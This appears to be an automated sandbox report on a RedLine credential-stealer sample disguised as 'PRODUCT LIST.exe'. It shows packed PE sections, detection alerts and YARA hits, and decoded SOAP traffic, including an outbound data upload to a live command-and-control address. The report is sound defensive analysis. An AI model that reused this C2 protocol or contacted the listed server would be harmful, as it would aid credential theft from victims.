(no name) | 0x2000 | 0x18000 | 0x8800 | c42c78b9832e754cb203176f75184e25 | False | 1.0006031709558822 | data | 7.994326576469916 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
(no name) | 0x1a000 | 0x4de | 0x400 | 4ca244fa9a5d437b9defb601583c39e2 | False | 0.7763671875 | data | 7.273072339326276 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
(no name) | 0x1c000 | 0xc | 0x200 | f24b480e2df71d69ab65261a0215f27d | False | 0.259765625 | data | 1.7804462848428606 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.vm_sec | 0x1e000 | 0x4000 | 0x4000 | d8f3017bae73815f607d2a4b3c4cefce | False | 0.1619873046875 | data | 2.885163065318065 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x22000 | 0x2000 | 0x200 | dbd0fc163d1022be46a45b67e74740b2 | False | 0.16796875 | data | 1.1405531534676816 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24000 | 0x2000 | 0x600 | f1fd96ed080911bb2659a9b13cb47065 | False | 0.376953125 | data | 3.7440317633000992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida | 0x26000 | 0x3e8000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.boot | 0x40e000 | 0x1a4200 | 0x1a4200 | 924e3b8c5d4f06112e3c6cc99d6da471 | False | 0.9948373809878013 | data | 7.95802050682975 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x24090 | 0x254 | data | | | 0.4597315436241611
RT_MANIFEST | 0x242f4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | English | United States | 0.5489795918367347
DLL | Import
kernel32.dll | GetModuleHandleA
mscoree.dll | _CorExeMain
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-24T11:49:06.021573+0100 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.5 | 49704 | 104.219.234.170 | 16383 | TCP
2024-11-24T11:49:11.146262+0100 | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 1 | 104.219.234.170 | 16383 | 192.168.2.5 | 49704 | TCP
2024-11-24T11:49:11.719835+0100 | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 1 | 192.168.2.5 | 49704 | 104.219.234.170 | 16383 | TCP
2024-11-24T11:49:17.537122+0100 | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 1 | 192.168.2.5 | 49706 | 104.219.234.170 | 16383 | TCP
2024-11-24T11:49:19.018903+0100 | 2848200 | ETPRO MALWARE RedLine - GetUpdates Request | 1 | 192.168.2.5 | 49707 | 104.219.234.170 | 16383 | TCP
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 24, 2024 11:49:04.399722099 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:04.519484997 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:04.519578934 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:04.539392948 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:04.659301043 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:04.899913073 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:05.019463062 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:05.966825008 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:06.021573067 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.026755095 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.026813984 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.146261930 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.146336079 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.719696999 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.719723940 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.719736099 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.719810963 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.719821930 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.719831944 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.719835043 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.719846964 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.719867945 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.719878912 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.719890118 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.719913960 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.719959974 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.727927923 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.771601915 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.839401007 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.880949020 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.930140972 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.930248022 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.930363894 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.934330940 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.934441090 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.934690952 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.942713022 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.942812920 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.943012953 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.951131105 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.951144934 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.951204062 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.959857941 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.959942102 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.959995031 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.967866898 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.967966080 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.968018055 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.977088928 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.977116108 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.977180958 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.984769106 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.984920979 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.984972954 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:11.993094921 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.993155956 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:11.993202925 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:12.001431942 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.001503944 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.001558065 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:12.009843111 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.009959936 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.010009050 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:12.050149918 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.050347090 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.050426006 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:12.140547991 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.140671015 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.140729904 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:12.143589020 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.143630028 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.143706083 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:12.148678064 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.148699045 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.148809910 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:12.154244900 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.154464006 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.154813051 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:12.159564972 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.159594059 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:12.159673929 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:15.885512114 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:15.885809898 CET  49706        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:16.006737947 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.006892920 CET  16383        49704      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.006979942 CET  49704        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:16.006979942 CET  49706        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:16.007179976 CET  49706        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:16.007436037 CET  49706        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:16.133919954 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.133938074 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.133949041 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.133960962 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.133972883 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.133984089 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.133995056 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.134006023 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.134016991 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.134028912 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.134035110 CET  49706        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:16.134035110 CET  49706        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:16.253643990 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.299760103 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.299781084 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.299793005 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.299804926 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.299817085 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:16.299846888 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:17.482080936 CET  16383        49706      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:17.483273983 CET  49707        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:17.537122011 CET  49706        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:17.602912903 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:17.603044987 CET  49707        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:17.603183031 CET  49707        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:17.722768068 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:17.959225893 CET  49707        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:18.080063105 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.080178022 CET  49707        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:18.080210924 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.080224991 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.080238104 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.080286980 CET  49707        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:18.080286980 CET  49707        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:18.080329895 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.080342054 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.080651999 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.080732107 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.081258059 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.081542969 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.199924946 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.200068951 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.200081110 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.200135946 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.200191975 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.247931004 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:18.999927998 CET  16383        49707      104.219.234.170  192.168.2.5
Nov 24, 2024 11:49:19.018763065 CET  49706        16383      192.168.2.5      104.219.234.170
Nov 24, 2024 11:49:19.018903017 CET  49707        16383      192.168.2.5      104.219.234.170
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 24, 2024 11:49:12.252300024 CET  59493        53         192.168.2.5  1.1.1.1
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name       Type            Class        DNS over HTTPS
Nov 24, 2024 11:49:12.252300024 CET  192.168.2.5  1.1.1.1  0xb122    Standard query (0)  api.ip.sb  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name       CName                         Address  Type                    Class        DNS over HTTPS
Nov 24, 2024 11:49:12.390635967 CET  1.1.1.1    192.168.2.5  0xb122    No error (0)  api.ip.sb  api.ip.sb.cdn.cloudflare.net           CNAME (Canonical name)  IN (0x0001)  false
• 104.219.234.170:16383

Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.5  49704        104.219.234.170  16383             5032  C:\Users\user\Desktop\PRODUCT LIST.exe

Timestamp                            Bytes transferred  Direction  Data (on the following lines)
Nov 24, 2024 11:49:04.539392948 CET  242                OUT
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
    Host: 104.219.234.170:16383
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Nov 24, 2024 11:49:05.966825008 CET  359                IN
    HTTP/1.1 200 OK
    Content-Length: 212
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Sun, 24 Nov 2024 10:49:05 GMT
    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Nov 24, 2024 11:49:11.026755095 CET  225                OUT
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
    Host: 104.219.234.170:16383
    Content-Length: 144
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
Nov 24, 2024 11:49:11.719696999 CET  1236               IN
    HTTP/1.1 200 OK
    Content-Length: 54852
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Sun, 24 Nov 2024 10:49:11 GMT
    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>91.232.174.157</b:string><b:string>128.90.170.13</b:string><b:string>1.192.194.168</b:string><b:string>1.192.194.168</b:string><b:string>144.48.39.108</b:string><b:string>149.22.81.166</b:string><b:string>37.120.207.190</b:string><b:string>154.16.169.89</b:string><b:string>178.208.168.4</b:string><b:string>128.90.60.18</b:string><b:string>37.19.212.105</b:string><b:string>128.90.170.18</b:string><b:string>37.19.212.105</b:string><b:string>37.19.212.105</b:string><b:string>128.90.170.18</b:string><b:string>37.19.212.105</b:string><b:string>138.199.21.219</b:string><b:string>139.186.206.86</b:s [TRUNCATED]


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1           192.168.2.5  49706        104.219.234.170  16383             5032  C:\Users\user\Desktop\PRODUCT LIST.exe

Timestamp                            Bytes transferred  Direction  Data (on the following lines)
Nov 24, 2024 11:49:16.007179976 CET  222                OUT
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
    Host: 104.219.234.170:16383
    Content-Length: 20789
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
Nov 24, 2024 11:49:17.482080936 CET  294                IN
    HTTP/1.1 200 OK
    Content-Length: 147
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Sun, 24 Nov 2024 10:49:17 GMT
    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                      Session ID   Source IP     Source Port   Destination IP    Destination Port   PID    Process
                                                                                      2            192.168.2.5   49707         104.219.234.170   16383              5032   C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      Timestamp                             Bytes transferred   Direction   Data
                                                                                      Nov 24, 2024 11:49:17.603183031 CET   242 bytes   OUT   POST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                      Host: 104.219.234.170:16383
                                                                                      Content-Length: 20781
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Connection: Keep-Alive
                                                                                      Nov 24, 2024 11:49:18.999927998 CET   408 bytes   IN   HTTP/1.1 200 OK
                                                                                      Content-Length: 261
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Sun, 24 Nov 2024 10:49:18 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                      Target ID:0
                                                                                      Start time:05:49:01
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\PRODUCT LIST.exe"
                                                                                      Imagebase:0x1f0000
                                                                                      File size:1'776'640 bytes
                                                                                      MD5 hash:A9B805862CCEE6848CE91EF51A31F71D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:05:49:02
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true